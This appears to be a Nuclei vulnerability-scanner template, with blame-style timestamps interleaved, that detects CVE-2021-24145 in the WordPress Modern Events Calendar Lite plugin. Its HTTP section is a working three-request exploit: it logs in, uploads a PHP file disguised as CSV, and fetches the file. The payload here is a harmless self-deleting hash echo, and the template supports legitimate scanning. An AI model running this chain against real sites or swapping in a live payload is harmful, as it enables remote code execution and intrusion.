2023-03-05 13:42:10 +00:00
id : CVE-2021-24145
info :
2023-03-27 17:46:47 +00:00
name : WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload
2023-03-05 13:42:10 +00:00
author : theamanrawat
severity : high
description : |
2023-03-27 17:46:47 +00:00
WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.
2023-09-27 15:51:13 +00:00
impact : |
Remote code execution
2023-09-06 12:09:01 +00:00
remediation : Fixed in version 5.16.5.
2023-03-05 13:42:10 +00:00
reference :
- https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610
- https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip
- https://github.com/dnr6419/CVE-2021-24145
- https://nvd.nist.gov/vuln/detail/CVE-2021-24145
2024-05-31 19:23:20 +00:00
- https://github.com/k0mi-tg/CVE-POC
2023-03-05 13:42:10 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score : 7.2
cve-id : CVE-2021-24145
cwe-id : CWE-434
2024-05-31 19:23:20 +00:00
epss-score : 0.96351
epss-percentile : 0.99553
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : webnus
product : modern_events_calendar_lite
2023-09-06 12:09:01 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus
2024-04-15 11:26:37 +00:00
variables :
string : "CVE-2021-24145"
2023-04-27 04:28:59 +00:00
http :
2023-03-05 13:42:10 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type : multipart/form-data; boundary=---------------------------132370916641787807752589698875
-----------------------------132370916641787807752589698875
Content-Disposition : form-data; name="feed"; filename="{{randstr}}.php"
Content-Type : text/csv
2024-04-15 11:26:37 +00:00
<?php echo md5("{{string}}");unlink(__FILE__);?>
2023-03-05 13:42:10 +00:00
-----------------------------132370916641787807752589698875
Content-Disposition : form-data; name="mec-ix-action"
import-start-bookings
-----------------------------132370916641787807752589698875 --
- |
GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
2024-04-15 11:26:37 +00:00
- type : word
part : body_3
words :
- '{{md5(string)}}'
2024-06-01 06:53:00 +00:00
# digest: 4b0a004830460221008f0ce98ee970e43771441d34c4ddb6a936223550c6a25e53079a2cbb79b11926022100be4c7dee887a3da101404a2f12a35b8ef8c5f34d7396462b88f9031f53e29f09:922c64590222798bb761d5b6d8e72950
